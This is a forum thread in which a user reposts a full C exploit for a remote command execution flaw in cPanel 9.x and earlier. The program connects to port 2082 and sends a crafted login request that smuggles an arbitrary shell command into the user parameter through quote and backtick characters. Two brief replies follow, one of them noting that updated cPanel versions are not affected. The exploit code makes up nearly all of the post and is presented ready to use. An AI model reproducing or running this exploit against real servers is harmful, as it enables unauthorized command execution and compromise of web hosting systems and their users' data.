Jump to content
xisto Community
Sign in to follow this  
sunny

[exploit] Cpanel Versions Below And Equal To 9x

Recommended Posts

Exploit for cPanel versions below and equal to 9x that takes advantage of a remote command execution vulnerability.

/*cPanel <= 9x Remote Command Execution*///headers#include <stdio.h>//In/Out#include <winsock2.h>//sockets functions#include <stdlib.h>//memory functions#include <string.h>//strlen,strcat,strcpy#pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"#define Port 2082 //port for connect to cPanel#define SIZE 1024 //buffer size to receive the data/*connect host:port*/SOCKET Conecta(char *Host, short puerto){	/*struct for make the socket*/	WSADATA wsaData;	SOCKET Winsock;//listener socket	/*two structures for connect*/	struct sockaddr_in Winsock_In;	struct hostent *Ip;	/*start the socket*/	WSAStartup(MAKEWORD(2,2), &wsaData);	/*make*/	Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);		//check socket status	if(Winsock==INVALID_SOCKET)	{		/*exit*/		WSACleanup();		return -1;	}	/*complete the struct*/	Ip=gethostbyname(Host);	Winsock_In.sin_port=htons(puerto);	Winsock_In.sin_family=AF_INET;	Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));	/*connect*/	if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)	{		/*end*/		WSACleanup();		return -1;	}	return Winsock;}/*MASTER FUNCTION*/int main(int argc, char *argv[]){	/*the socket*/	SOCKET sock;	/*make the evil buffer to send the request*/	char evil_request[]="GET /login/?user=|%22%60";	char evil_request2[]="%60%22\r";	char *evil;	/*to receive the data*/	char buf[SIZE];	printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex");    printf("\n");	printf("\n-----------------------------------------------------\n");	if(argc!=3)//cPanel_9x_rce.exe <host> <command>	{		printf("\n[+] Usage: %s <host> <command>\n",argv[0]);		return 0;	}	printf("\n[+] Connecting  %s:%d...",argv[1],Port);	/*start the exploit*/	sock=Conecta(argv[1],Port);//connect	if(sock==-1)	{		printf("Error\n");		return 1;	}	printf("OK");	/*make the EVIL request*/	evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));	strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n");	//sends it	send(sock,evil,strlen(evil),0);	buf[recv(sock,buf,SIZE,0)]='\0';	//show the data	printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);	WSACleanup();	LocalFree(buf);	LocalFree(evil);	return 0;}

Share this post


Link to post
Share on other sites

interesting indeed but i don't think we could fix that ourselves since this is free hosting. but still interesting that you found this.

Share this post


Link to post
Share on other sites

I have found it on some security portal. It is interresting to know that our faithful cPanel has some vulnerabilities.One more thing. While I was experimenting with the code, I found out that the server is secure if it is using an updated version of cPanel. And in Xisto's case I am sure that we are secure :-)

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.